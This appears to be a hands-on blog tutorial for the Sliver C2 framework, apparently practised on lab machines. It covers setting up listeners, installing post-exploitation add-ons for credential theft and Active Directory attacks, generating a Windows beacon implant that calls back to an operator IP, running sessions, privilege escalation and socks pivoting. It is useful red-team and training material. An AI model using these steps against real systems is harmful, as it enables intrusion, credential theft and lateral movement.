Skip to main content

Sliver C2

  • https://github.com/BishopFox/sliver

Installation

Download both the sliver-server and sliver-client from the release for your platform and you are done :)

➜  sliver wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux
➜  sliver wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux
➜  sliver ls
sliver-client  sliver-server

Now we can run the sliver-server and it will drop us in a console where we can do basically everything we expect from a C2, like generating payloads, beacons, start listeners, interact with our beacons, etc...

➜  sliver ./sliver-server
[*] Loaded 21 aliases from disk
[*] Loaded 110 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain infect
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

[server] sliver >

Multiplayer Mode

Multiplayer-mode allows multiple operators (players) to connect to the same Sliver server. Basically, you start the server and you can also start the client that will connect to the server where you get the same console, and the server can be remotely somewhere, but also it can be locally because if you accidently close the server, the beacons will have trouble connecting back to you but if you close the client nothing bad would happen, hope that makes sense. To setup multiplayer mode, we need to first create a new operator and give it a name, then we tell it that the connection will come from localhost:

[server] sliver > new-operator --name serioton --lhost localhost

[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /home/serioton/sliver/serioton_localhost.cfg

Now, we need to put sliver into multiplayer mode:

[server] sliver > multiplayer

[*] Multiplayer mode enabled!

In another tab we can start the sliver-client and tell it to import the configurations we just generated:

➜  sliver ./sliver-client import /home/serioton/sliver/serioton_localhost.cfg
2024/06/30 07:12:54 Saved new client config to: /home/serioton/.sliver-client/configs/serioton_localhost.cfg

After that, we just start the client and it will connect to the server

➜  sliver ./sliver-client
? Select a server: serioton@localhost (2a966044d4c58511)
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 110 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain prowess
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver >

We will get this message in the server

[*] serioton has joined the game

Installing the tools

To install all the third-party post exploitation tools, we can run the following command:

sliver > armory install all

? Install 21 aliases and 128 extensions? Yes
[*] Installing alias 'Rubeus' (v0.0.24) ... done!
[*] Installing alias 'SharpSecDump' (v0.0.1) ... done!
[*] Installing alias 'SharpLAPS' (v0.0.1) ... done!
[*] Installing alias 'NoPowerShell' (v0.0.2) ... done!
[*] Installing alias 'SharpChrome' (v0.0.3) ... done!
[*] Installing alias 'SharpSCCM' (v0.0.2) ... done!
[*] Installing alias 'sharpsh' (v0.0.1) ... done!
[*] Installing alias 'SharpHound v4' (v0.0.2) ... done!
[*] Installing alias 'Sharp WMI' (v0.0.2) ... done!
[*] Installing alias 'Certify' (v0.0.3) ... done!
[*] Installing alias 'SharpUp' (v0.0.1) ... done!
[*] Installing alias 'SharpRDP' (v0.0.1) ... done!
[*] Installing alias 'sqlrecon' (v0.0.3) ... done!
[*] Installing alias 'Seatbelt' (v0.0.5) ... done!
[*] Installing alias 'SharPersist' (v0.0.2) ... done!
[*] Installing alias 'Sharp Hound 3' (v0.0.2) ... done!
[SNIP]
[*] All packages installed

If we want to list all the available packages, we can run the armory command without arguments:

sliver > armory

[*] Fetching 1 armory index(es) ... done!
[*] Fetching package information ... done!

 Packages
 Command Name                  Version   Type        Help
============================= ========= =========== =========================================================================================================================================
 bof-roast                     v0.0.2    Extension   Beacon Object File repo for roasting Active Directory
 bof-servicemove               v0.0.1    Extension   Lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking
 c2tc-addmachineaccount        v0.0.9    Extension   AddMachineAccount [Computername] [Password <Optional>]
 c2tc-askcreds                 v0.0.9    Extension   Collect passwords using CredUIPromptForWindowsCredentialsName
 c2tc-domaininfo               v0.0.9    Extension   enumerate domain information using Active Directory Domain Services
 c2tc-kerberoast               v0.0.9    Extension   A BOF tool to list all SPN enabled user/service accounts or request service tickets (TGS-REP)

[SNIP]

If we want to install a specific package, we can do so by providing the package name:

sliver > armory install rubeus

[*] Installing alias 'Rubeus' (v0.0.24) ... done!

Basic Commands

Setup a listener

To create a listener on port 53, we can use the following command:

sliver > mtls --lport 53

[*] Starting mTLS listener ...

[*] Successfully started job #2

mtls means mutual TLS which is a TCP listener but the communication over it is encrypted. We can also start http or https listeners:

sliver > http --lport 80

[*] Starting HTTP :80 listener ...
[*] Successfully started job #3
sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #4

List and kill jobs

We can see the listeners we have using the jobs command

sliver > jobs

 ID   Name    Protocol   Port    Stage Profile
==== ======= ========== ======= ===============
 1    grpc    tcp        31337
 2    mtls    tcp        53
 3    http    tcp        80
 4    https   tcp        8443

To kill a listener, we use the command jobs -k <listener_id> and provide the listener ID we want to stop:

sliver > jobs -k 3

[*] Killing job #3 ...
[!] Job #3 stopped (tcp/http)

[!] Job #3 stopped (tcp/http)

[*] Successfully killed job #3
sliver > jobs -k 4

[*] Killing job #4 ...
[!] Job #4 stopped (tcp/https)

[*] Successfully killed job #4

[!] Job #4 stopped (tcp/https)
sliver > jobs

 ID   Name   Protocol   Port    Stage Profile
==== ====== ========== ======= ===============
 1    grpc   tcp        31337
 2    mtls   tcp        53

Beacons

Generating beacons

To generate a beacon, we can use the generate beacon command, in this case we generate a beacon for windows 64 bit, the format is .exe and we tell it to connect to our IP:

sliver > generate beacon --seconds 30 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http <IP> --name meow --save /tmp/beacon.exe -G --skip-symbols

[*] Generating new windows/amd64 beacon implant binary (30s)
[!] Symbol obfuscation is disabled
[*] Build completed in 3s
[*] Implant saved to /tmp/beacon.exe

The -G skips Shikata-Ganai-Encoding and --skip-symbols will leave sliver strings inside the binary. This reduces file size but can lead to detection.

Listing and interacting with beacons

To list all the beacons we have, we can use the beacons command:

sliver > beacons

 ID         Name           Transport   Hostname    Username               Operating System   Last Check-In   Next Check-In
========== ============== =========== =========== ====================== ================== =============== ===============
 a7b8c0ca   mist-http      http(s)     MS01        MIST\Brandon.Keywarp   windows/amd64      257h38m33s      257h38m2s
 7717ce78   axlle          http(s)     MAINFRAME   AXLLE\gideon.hamill    windows/amd64      180h58m49s      180h58m18s
 [SNIP]
 ede730e4   meow   http(s)     DC1         BLAZORIZED\NU_1055     windows/amd64      11h50m21s       11h49m50s

To interact with a beacon, we can run the use command and give it the beacon ID:

sliver > use ede730e4

[*] Active beacon meow (ede730e4-cc70-4552-9e7f-f4a8fa557615)

sliver (meow) >

Sessions

To turn a beacon into a session, we run the interactive command:

sliver (meow) > interactive

[*] Using beacon's active C2 endpoint: https://10.10.14.8:8443
[*] Tasked beacon meow (8d057a41)

This will create a running task that will open an interactive session when it's time to execute again

[*] Session 2b8213e1 ...

We can list sessions using the command sessions. If we want to switch to the context of the session, we can do so by using the following command:

sliver (meow) > use 2b8213e1-5f9e-4d4f-b003-b17e62a239c3

[*] Active session meow (2b8213e1-5f9e-4d4f-b003-b17e62a239c3)

Other useful commands

execute-assembly

With execute-assembly we can run a .NET assembly (DLL or exe) in memory, by spawning a new process (notepad by default) that hosts the .NET-CLR.

getsystem

Spawn a new session as NT AUTHORITY/SYSTEM, by injecting into a system process when you are already in a high privileged shell.

ps

List processes and identify running security products such as AVs and EDRs.

socks5

Start a socks5 proxy in your implant with socks5 start. This proxy can then be used with e.g. proxychains to tunnel your tools through the implant into the corporate network.

sideload

Load and execute a shared object (shared library/DLL) in a remote process

Conclusion

This was a basic intro to sliver C2, but there's a lot more you can do with it. Checkout the official documentation here: https://sliver.sh/docs. It's very detailed and explains many things you can do with Sliver.

Resources

  • https://bishopfox.com/blog/passing-the-osep-exam-using-sliver